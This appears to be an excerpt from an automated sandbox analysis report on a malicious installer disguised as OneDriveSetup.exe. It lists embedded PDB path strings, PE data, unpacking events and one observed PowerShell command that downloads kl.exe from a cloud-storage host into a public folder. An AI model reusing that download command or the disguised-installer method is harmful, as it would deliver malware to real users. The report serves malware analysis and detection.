                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: bin.exe, 00000017.00000003.1603538546.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: bin.exe, 00000017.00000003.1645474810.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: bin.exe, 00000017.00000003.1577950171.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: bin.exe, 00000017.00000003.1626865159.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: bin.exe, 00000017.00000003.1545410871.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: bin.exe, 00000017.00000003.1504688065.0000000002735000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000022.00000003.1831133678.000002335EBD9000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000022.00000003.1829045886.000002335EB1C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: bin.exe, 00000017.00000003.1563142102.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: bin.exe, 00000017.00000003.1562615212.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: bin.exe, 00000017.00000003.1592199042.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: bin.exe, 00000017.00000003.1559734523.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: bin.exe, 00000017.00000003.1572181995.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: bin.exe, 00000017.00000003.1587357502.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: bin.exe, 00000017.00000003.1637794932.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: bin.exe, 00000017.00000003.1526409476.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: bin.exe, 00000017.00000003.1604218262.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: bin.exe, 00000017.00000003.1565142472.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.IdentityModel.pdb source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: bin.exe, 00000017.00000003.1596763609.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: bin.exe, 00000017.00000003.1625012758.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb}> source: bin.exe, 00000017.00000003.1678869626.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: bin.exe, 00000017.00000003.1610160975.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\build\xra_common\webview_3497\Release_tjfuyun\webview.pdb. source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: Z:\Zemana\Projects\AMSDKCore\Driver\zam64.pdb source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: bin.exe, 00000017.00000003.1577151692.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: bin.exe, 00000017.00000003.1538662280.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: bin.exe, 00000017.00000003.1543633291.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: bin.exe, 00000017.00000003.1643180881.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: bin.exe, 00000017.00000003.1630497195.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Z:\Zemana\Projects\AntiMalware\bin\zam64.pdb source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1606248215.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: bin.exe, 00000017.00000003.1561174473.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: bin.exe, 00000017.00000003.1600632610.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: bin.exe, 00000017.00000003.1551600625.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: bin.exe, 00000017.00000003.1645474810.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: bin.exe, 00000017.00000003.1553314105.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Mono.Cecil.Pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: bin.exe, 00000017.00000003.1600056818.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: bin.exe, 00000017.00000003.1575333150.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: bin.exe, 00000017.00000003.1529710100.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: bin.exe, 00000017.00000003.1646188460.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: bin.exe, 00000017.00000003.1633109053.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: bin.exe, 00000017.00000003.1581060305.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: bin.exe, 00000017.00000003.1641668329.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: bin.exe, 00000017.00000003.1620645331.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: bin.exe, 00000017.00000003.1589104804.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: bin.exe, 00000017.00000003.1545410871.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: bin.exe, 00000017.00000003.1617348748.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: bin.exe, 00000017.00000003.1535471188.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1596242728.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: bin.exe, 00000017.00000003.1512120926.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: bin.exe, 00000017.00000003.1552159132.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: bin.exe, 00000017.00000003.1531102979.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: bin.exe, 00000017.00000003.1631518950.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1617972564.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1551600625.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: bin.exe, 00000017.00000003.1569651251.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: bin.exe, 00000017.00000003.1625556136.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: bin.exe, 00000017.00000003.1646188460.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: bin.exe, 00000017.00000003.1627316997.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: bin.exe, 00000017.00000003.1616704287.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdbR source: bin.exe, 00000017.00000003.1551101243.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: bin.exe, 00000017.00000003.1589953846.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: bin.exe, 00000017.00000003.1642655283.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: bin.exe, 00000017.00000003.1633728741.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: bin.exe, 00000017.00000003.1646939143.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: bin.exe, 00000017.00000003.1536326659.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: bin.exe, 00000017.00000003.1593483290.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: bin.exe, 00000017.00000003.1615509654.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: bin.exe, 00000017.00000003.1629430171.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: bin.exe, 00000017.00000003.1565839959.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: bin.exe, 00000017.00000003.1538662280.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: bin.exe, 00000017.00000003.1618601938.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: bin.exe, 00000017.00000003.1544903906.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: bin.exe, 00000017.00000003.1639032226.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: bin.exe, 00000017.00000003.1579218741.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: bin.exe, 00000017.00000003.1568304896.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: bin.exe, 00000017.00000003.1529710100.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001D.00000000.1811026709.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001D.00000002.1813119826.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000002.1855324120.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000000.1813487867.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.1856420036.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.1857742975.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: bin.exe, 00000017.00000003.1596242728.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: bin.exe, 00000017.00000003.1577151692.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: bin.exe, 00000017.00000003.1605485031.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: bin.exe, 00000017.00000003.1597283206.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: bin.exe, 00000017.00000003.1558254585.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: bin.exe, 00000017.00000003.1598931157.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: F:\dbs\sh\odct\0201_092045\client\onedrive\Setup\standalone\exe\obj\amd64\OneDriveSetup.pdb source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1570344266.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: bin.exe, 00000017.00000003.1612215932.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: bin.exe, 00000017.00000003.1583783784.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: bin.exe, 00000017.00000003.1574773739.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: bin.exe, 00000017.00000003.1567675313.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: OneDriveSetup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                Source: C:\Users\user\Desktop\OneDriveSetup.exeUnpacked PE file: 0.2.OneDriveSetup.exe.140000000.2.unpack
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeUnpacked PE file: 9.2.Agghosts.exe.10000000.2.unpack
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeUnpacked PE file: 24.2.Agghosts.exe.10000000.2.unpack
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"
                Source: System.Web.Services.Description.resources.dll.23.drStatic PE information: 0x98399BEE [Tue Dec 6 04:05:02 2050 UTC]
